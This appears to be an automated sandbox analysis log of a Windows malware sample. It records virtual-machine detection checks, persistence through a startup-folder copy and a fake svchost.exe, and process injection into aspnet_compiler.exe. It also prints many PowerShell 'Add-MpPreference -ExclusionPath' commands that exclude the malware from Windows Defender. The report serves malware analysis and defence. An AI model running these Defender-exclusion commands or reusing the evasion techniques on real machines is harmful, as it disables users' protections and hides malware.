                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareW_MATVN9Win32_VideoControllerHOLHWM8BVideoController120060621000000.000000-00029545192display.infMSBDAT374VDSOPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsR8CMBEKU
                      Source: svchost.exe, 00000004.00000002.565151015.0000028D9A45F000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000004.00000002.564749589.0000028D9A449000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000008.00000002.551410688.0000017E86402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000004.00000002.557362596.0000028D94C24000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@aF
                      Source: svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: rm'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000008.00000002.551595749.0000017E86429000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.561851061.000002BA27C67000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.557866132.000002A146A2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0040289F
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_024C6AD8 LdrInitializeThunk,1_2_024C6AD8
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 438000Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43A000Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: CF7008Jump to behavior
